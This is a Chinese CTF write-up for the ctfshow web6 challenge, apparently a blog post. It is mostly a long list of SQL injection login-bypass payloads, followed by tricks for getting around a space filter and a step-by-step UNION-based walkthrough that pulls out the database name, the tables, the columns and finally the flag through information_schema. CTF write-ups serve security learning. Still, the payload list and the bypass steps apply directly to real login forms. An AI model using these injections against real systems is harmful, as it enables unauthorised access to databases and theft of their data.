• CTF web之旅 26


    ctfshow web6

    万能密码跑一遍看看能不能看出过滤了啥东西

    或者推测书查询语句格式

    "or "a"="a
    '.).or.('.a.'='.a
    or 1=1--
    'or 1=1--
    a'or' 1=1--
    "or 1=1--
    'or.'a.'='a
    "or"="a'='a
    'or''='
    'or'='or'
    admin'or 1=1#
    '='&password='='
    admin' or 1=1#
    admin'/**/or/**/1=1#
    admin'/*
    */'
    'or 1=1/*
    "or "a"="a
    "or 1=1--
    "or"="
    "or"="a'='a
    "or1=1--
    "or=or"
    ''or'='or'
    ') or ('a'='a
    '.).or.('.a.'='.a
    'or 1=1
    'or 1=1--
    'or 1=1/*
    'or"="a'='a
    'or' '1'='1'
    'or''='
    'or''=''or''='
    'or'='1'
    'or'='or'
    'or.'a.'='a
    'or1=1--
    1'or'1'='1
    a'or' 1=1--
    a'or'1=1--
    or 'a'='a'
    or 1=1--
    or1=1--
    'or'='or'
    admin
    admin'--
    admin' or 4=4--
    admin' or '1'='1'--
    admin888
    "or "a"="a
    admin' or 2=2#
    a' having 1=1#
    a' having 1=1--
    admin' or '2'='2
    ')or('a'='a
    or 4=4--
    c
    a'or' 4=4--
    "or 4=4--
    'or'a'='a
    "or"="a'='a
    'or''='
    'or'='or'
    1 or '1'='1'=1
    1 or '1'='1' or 4=4
    'OR 4=4%00
    "or 4=4%00
    'xor
    admin' UNION Select 1,1,1 FROM admin Where ''='
    1
    -1%cf' union select 1,1,1 as password,1,1,1 %23
    1
    17..admin' or 'a'='a 密码随便
    'or'='or'
    'or 4=4/*
    something
    ' OR '1'='1
    1'or'1'='1
    admin' OR 4=4/*
    1'or'1'='1

    看来是空格被过滤  单引号包裹

    空格过滤绕过方法

    空格:
    %a0代替空格绕过
    多用括号绕过,?id='union(select(1),(2),(3));%00
    注释符/**/
    `(tap键上面的按钮)
    tap
    两个空格
     
    知道了这两点 一顿撸就出来了

    1、查字段

    admin'/**/or/**/1=1/**/order/**/by/**/3#admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#

    2、查库(web2)

    admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#

    3、查表(flag,user)

    admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#

    admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#

    4、查字段flag

    admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#

    5、查字段flag内容admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#

  • 相关阅读:
    [WPF]Win10便签软件
    [WPF]使用Fody提高效率
    [WPF]限制程序单例运行
    [WPF]创建系统栏小图标
    Run Performance Testing Which Was Distributed To Multiple Test Agents
    FxZ,C#开发职位面试测试题(30分钟内必须完成)
    BYS推荐MS前端PhoneCall面试问题整理-2
    BYS推荐MS前端PhoneCall面试问题整理-1
    LxNx前端F2F面试问题整理
    复杂DIV交错布局
  • 原文地址:https://www.cnblogs.com/akger/p/14681383.html
Copyright © 2020-2023  润新知